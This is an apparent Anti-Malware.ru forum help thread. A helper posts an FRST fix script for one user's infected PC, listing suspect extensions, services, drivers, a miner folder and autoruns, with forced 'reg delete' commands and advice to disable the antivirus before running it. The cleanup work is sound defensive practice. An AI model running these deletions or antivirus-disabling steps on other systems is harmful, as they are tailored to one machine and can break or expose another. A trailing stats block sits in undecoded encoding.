HKLM-x32 - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll No File FF Extension: (supermegabest) - C:\Users\Огурцов\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\[email protected] [2016-03-23] [Legacy] FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\autoconfig.js [2018-11-08] <==== ATTENTION (Points to *.cfg file) FF ExtraCheck: C:\Program Files\mozilla firefox\cck2.cfg [2018-11-08] <==== ATTENTION CHR Profile: C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2016-12-04] <==== ATTENTION CHR Extension: (No Name) - C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ahggfmgiidlaceichjfemgbaggnbaloe [2017-11-02] CHR Extension: (Adblocker for Youtube™) - C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\cpmgdbdchhjimcbfbbhlbchbobhjonna [2016-12-22] CHR Profile: C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\System Profile [2017-01-27] CHR Extension: (No Name) - C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\ahggfmgiidlaceichjfemgbaggnbaloe [2017-11-02] CHR Extension: (Adblocker for Youtube™) - C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\cpmgdbdchhjimcbfbbhlbchbobhjonna [2016-12-22] CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ahkmpjnmnhjkpkacdhkliipnncobgkhk] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [gndelhfhcfbdhndfpcinebijfcjpmpec] - hxxp://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [phokcamelcbnjikjgomjjadeihhbbidh] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ablpcikjmhamjanpibkccdmpoekjigja] - hxxp://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [aonedlchkbicmhepimiahfalheedjgbh] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [bhjhnafpiilpffhglajcaepjbnbjemci] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ccfifbojenkenpkmnbnndeadpfdiffof] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [clgckgfbhciacomhlchmgdnplmdiadbj] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [hcadgijmedbfgciegjomfpjcdchlhnif] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ilhapdfjlmhfdgdbefpinebijmhjijpn] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [indjgiebmakhmnaplnlnanodkfiejfjd] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [lhemechcanjmilllmccjbjldonmnnjjj] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ojlcebdkbpjdpiligkdbbkdkfjmchbfd] - hxxps://clients2.google.com/service/update2/crx HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Setmy\Application\chrome.exe <==== ATTENTION S2 Anubophatuvot; C:\Program Files (x86)\Secockarercient\JahashargkCch.dll [X] S2 Archer; C:\Program Files (x86)\WinArcher\Archer.dll [X] <==== ATTENTION S2 Cercither; C:\Program Files (x86)\Natertionkacerse\PptPrv.dll [X] S2 HPWombat Service; C:\Program Files (x86)\HPWombat\HPWombatSrv.exe [X] <==== ATTENTION S2 InstallerService; C:\Program Files\TrueKey\Mcafee.TrueKey.InstallerService.exe -originalversion 4.4.127.0 [X] S2 TrueKey; "C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe" [X] S2 zutuzuni; C:\Program Files (x86)\87684081-1451210377-11CB-A5D0-F6E7D98D013F\jnsc7866.tmp [X] <==== ATTENTION S1 kdvscdat; \??\C:\WINDOWS\system32\drivers\kdvscdat.sys [X] S1 kkpqecnb; \??\C:\WINDOWS\system32\drivers\kkpqecnb.sys [X] S1 zmyotbtz; \??\C:\WINDOWS\system32\drivers\zmyotbtz.sys [X] 2019-01-25 16:39 - 2019-01-25 16:39 - 000000062 ____C C:\Users\Огурцов\AppData\Roaming\at.txt 2019-01-19 16:05 - 2019-01-19 16:05 - 000000000 ___DC C:\ProgramData\ByteFence 2019-01-19 15:53 - 2019-01-19 15:53 - 000001046 ____C C:\Users\Огурцов\Desktop\ByteFence Anti-Malware.lnk 2019-01-19 15:53 - 2019-01-19 15:53 - 000000000 ___DC C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ByteFence Anti-Malware 2019-01-19 15:51 - 2019-01-19 15:51 - 000000000 ___DC C:\Users\Огурцов\AppData\Roaming\efixmypc.com 2019-01-19 15:50 - 2019-01-25 17:47 - 000000000 ___DC C:\Program Files\Advance PC-Care Virustotal: C:\Users\Огурцов\Downloads\opengl.exe Virustotal: C:\Users\Огурцов\Downloads\OneShot Русификатор.exe 2019-01-19 15:50 - 2019-01-19 15:50 - 000221302 ____C C:\Users\Огурцов\AppData\Roaming\DMGR_1N1I1F1S1T1I0M1F1Q2Y1I1P1B0C1F1Q1P.txt 2019-01-19 15:50 - 2019-01-19 15:50 - 000000860 ____C C:\Users\Public\Desktop\Advance PC-Care.lnk 2019-01-19 15:50 - 2019-01-19 15:50 - 000000000 ___DC C:\Users\Все пользователи\efixmypc.com 2019-01-19 15:50 - 2019-01-19 15:50 - 000000000 ___DC C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advance PC-Care 2019-01-19 15:50 - 2019-01-19 15:50 - 000000000 ___DC C:\ProgramData\efixmypc.com 2019-01-25 17:24 - 2018-12-27 17:23 - 000000000 _SHDC C:\ProgramData\mineonepapkavostonaj 2018-01-10 18:16 - 2018-01-10 18:16 - 000000288 ___HC () C:\Users\Огурцов\AppData\Roaming\3b01b117ec3368f4c02bec10fe19f5bfb929dd2b 2016-10-25 15:37 - 2016-10-25 15:37 - 007214592 ____C () C:\Users\Огурцов\AppData\Roaming\agent.dat 2016-10-25 15:37 - 2016-10-25 15:29 - 000710656 ____C () C:\Users\Огурцов\AppData\Roaming\Ansoft.exe 2016-10-25 15:37 - 2016-10-25 15:37 - 001910964 ____C () C:\Users\Огурцов\AppData\Roaming\Ansoft.tst 2019-01-19 15:50 - 2019-01-19 15:50 - 000221302 ____C () C:\Users\Огурцов\AppData\Roaming\DMGR_1N1I1F1S1T1I0M1F1Q2Y1I1P1B0C1F1Q1P.txt 2018-01-10 05:59 - 2018-01-10 05:59 - 000000128 ___HC () C:\Users\Огурцов\AppData\Roaming\ecf00c38dc807e105d881c433a6b455dd2c606b6 2015-12-27 13:03 - 2015-12-27 13:03 - 000005120 ____C () C:\Users\Огурцов\AppData\Roaming\GiftBag.db 2016-10-23 15:52 - 2016-10-25 15:34 - 000016368 ____C () C:\Users\Огурцов\AppData\Roaming\InstallationConfiguration.xml 2016-10-23 15:52 - 2016-10-25 15:29 - 000140288 ____C () C:\Users\Огурцов\AppData\Roaming\Installer.dat 2016-10-25 15:37 - 2016-10-25 15:37 - 000018432 ____C () C:\Users\Огурцов\AppData\Roaming\Main.dat 2016-10-25 15:37 - 2016-10-25 15:37 - 000005568 ____C () C:\Users\Огурцов\AppData\Roaming\md.xml 2016-10-25 15:37 - 2016-10-25 15:37 - 000126464 ____C () C:\Users\Огурцов\AppData\Roaming\noah.dat 2016-10-25 15:38 - 2016-10-25 15:38 - 000032038 ____C () C:\Users\Огурцов\AppData\Roaming\uninstall_temp.ico 2016-10-25 15:34 - 2016-10-25 15:34 - 000190394 ____C () C:\Users\Огурцов\AppData\Roaming\Vaiadax.bin C:\Users\Огурцов\AppData\Local\Mail.Ru\MailRuUpdater.exe C:\Users\Огурцов\AppData\Local\Mail.Ru C:\program files (x86)\common files\tencent Reg: reg delete "HKU\S-1-5-21-2316502943-295965077-1323287568-1001\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater" /f CMD: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}}" /f /reg:32 Reg: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UBar" /f CMD: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Youtube AdBlock}" /f /reg:32 CMD: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}}" /f /reg:32 CMD: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ZaxarGameBrowser4_is1}" /f /reg:32 CMD: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ZaxarGameBrowser5_is1)" /f /reg:32 ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File ContextMenuHandlers1_S-1-5-21-2316502943-295965077-1323287568-1001: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File ContextMenuHandlers4_S-1-5-21-2316502943-295965077-1323287568-1001: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File ContextMenuHandlers5_S-1-5-21-2316502943-295965077-1323287568-1001: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File Task: {0D8A891D-890C-4808-84D8-2F436AB14653} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION Task: {1274336E-AB06-46B6-A48C-0671C5557CC6} - \Microsoft\Windows\TaskScheduler\Maintenance Configurator -> No File <==== ATTENTION Task: {1687544D-7247-4F5A-965A-A6E920E55278} - \Microsoft\Windows\TaskScheduler\Manual Maintenance -> No File <==== ATTENTION Task: {40525C58-79C2-47A1-9AA2-F1D7FC4F0691} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION Task: {41699307-0CBD-47C4-B41E-61216AD1EE7D} - System32\Tasks\DriverPack Cloud => C:\Program Files (x86)\DriverPack Cloud\cloud.exe Task: {6F02587F-8A2B-4552-97F6-DEEF229E335B} - \Microsoft\Windows\TaskScheduler\Idle Maintenance -> No File <==== ATTENTION Task: {B7992938-01F1-4F40-A0EC-0D23D2F0F152} - \Microsoft\Windows\TaskScheduler\Regular Maintenance -> No File <==== ATTENTION Task: {CFD7C21A-808B-487B-A6EC-8A10E44E8360} - \Microsoft\Windows\SettingSync\BackupTask -> No File <==== ATTENTION Task: {DA093982-3E58-440C-AC74-B5DD36D60170} - System32\Tasks\MailRuUpdater => C:\Users\Огурцов\AppData\Local\Mail.Ru\MailRuUpdater.exe [2017-11-24] (Mail.Ru) <==== ATTENTION Task: {E431B18E-FF30-412E-956A-F9E0DB99445C} - System32\Tasks\CrashRptz => C:\Users\Огурцов\AppData\Local\CrashRpt\CrashRptz.exe WMI:subscription\__FilterToConsumerBinding->LogFileEventConsumer.Name=\"DeviceChangeConsumer\"",Filter="__EventFilter.Name=\"DeviceChangeFilter\":: WMI:subscription\__EventFilter->DeviceChangeFilter::[Query => select * from __instanceOperationEvent within 10 where targetInstance isa 'win32_PnPEntity'] WMI:subscription\LogFileEventConsumer->DeviceChangeConsumer:: HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\QQPCRTP => ""="service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\QQPCRTP => ""="service" HKLM\...\StartupApproved\StartupFolder: => "Zaxar Games Browser.lnk" HKLM\...\StartupApproved\StartupFolder: => "McAfee Security Scan Plus.lnk" HKLM\...\StartupApproved\Run: => "WindowsDefender" HKLM\...\StartupApproved\Run32: => "DiskPower" HKLM\...\StartupApproved\Run32: => "IconRunner" HKLM\...\StartupApproved\Run32: => "PWRISOVM.EXE" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\StartupFolder: => "ProfitTaskMonitor.lnk" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "amigo" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "1D8NLRRVNF" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "1IHC5CK5HN" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "3UY4CSROFQ" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "hdtask" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "MailRuUpdater" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "299GTXK38W" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "LTCCY5NFU4" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "RI7FIMYQGU" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "CIUOLCHQV6" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "52THSX3HBL" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "U3VZY4RS3N" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "7S0YZZDLPN" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "ADUE8JHHLJ" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "V527APOCWN" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "E6H6A1LMPM" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "FPEFT4XU1J" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "95RTWV2W37" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "9IO1NQKL9A" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "5YGZRUKDMF" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "17Z9ZGZLNZ" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "mailruhomesearch" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "K8J77YTFGJ" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "6GMTU8RLCT" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "RMIW4E6JXC" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "ycAutoLaunch_1C57F4F4FD8066828BC5E4D43E9AF813" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "Orbitum Update" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "CurrencyConvertor" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "aebleyzkpy" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "LumProcess" HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_918ABA8B1445D313589FE9A369122F26" FirewallRules: [{D4A13780-20C2-4677-A94E-DC0390ECA138}] => (Allow) C:\Users\Огурцов\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe No File FirewallRules: [{BEE75AB0-0CA6-42F8-A2F2-FA7A850F3068}] => (Allow) C:\program files (x86)\common files\tencent\qqdownload\130\tencentdl.exe (Tencent) FirewallRules: [{89046AB3-85C2-4A93-902E-3A04E8816CD4}] => (Allow) C:\program files (x86)\common files\tencent\qqdownload\130\bugreport_xf.exe () FirewallRules: [{3A71A011-3C8C-4223-83B3-F74CA82E473F}] => (Allow) C:\Program Files\UBar\ubar.exe No File FirewallRules: [{7173787B-DE1F-489E-9E94-23F93F139957}] => (Allow) C:\Program Files (x86)\Setmy\Application\chrome.exe No File FirewallRules: [{D8E881C5-2077-4392-94A6-D566049C04AB}] => (Allow) C:\Program Files (x86)\Opera\opera.exe No File FirewallRules: [{AFA9F0FE-AC37-4B04-8BF4-AC43018C5F7A}] => (Allow) C:\Program Files (x86)\Opera\opera.exe No File FirewallRules: [{84310AF7-A8CF-4D83-8AE9-1E1C1D2AA2A4}] => (Block) %ProgramFiles% (x86)\Bandicam\bdcam.exe No File FirewallRules: [{D5F2A808-CA1B-4949-8377-CD9690005013}] => (Allow) C:\Users\Огурцов\AppData\Local\Amigo\Application\amigo.exe No File FirewallRules: [{45D538B8-C1A2-4846-B333-E0F53B95CB78}] => (Allow) C:\Users\Огурцов\AppData\Local\yc\Application\yc.exe No File Reboot:
Отключите до перезагрузки антивирус, закройте все браузеры, запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
Сделайте лог Malwarebytes AdwCleaner.
WBR,
Vadim
=D1=F2=E0=F2=E8=F1=F2=E8=EA=E0 =EF=F0=EE=E2=E5=E4=E5=ED=ED=EE=E3=EE =EB=
=E5=F7=E5=ED=E8=FF:
- =CF=EE=EB=F3=F7=E5=ED=EE =EA=E0=F0=E0=ED=F2=E8=ED=EE=E2: 2
- =CE=E1=F0=E0=E1=EE=F2=E0=ED=EE =F4=E0=E9=EB=EE=E2: 7
- =C2 =F5=EE=E4=E5 =EB=E5=F7=E5=ED=E8=FF =E2=F0=E5=E4=EE=ED=EE=F1=ED=FB=
=E5 =EF=F0=EE=E3=F0=E0=EC=EC=FB =E2 =EA=E0=F0=E0=ED=F2=E8=ED=E0=F5 =ED=
=E5 =EE=E1=ED=E0=F0=F3=E6=E5=ED=FB
Уважаемый(ая) Foxwill, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.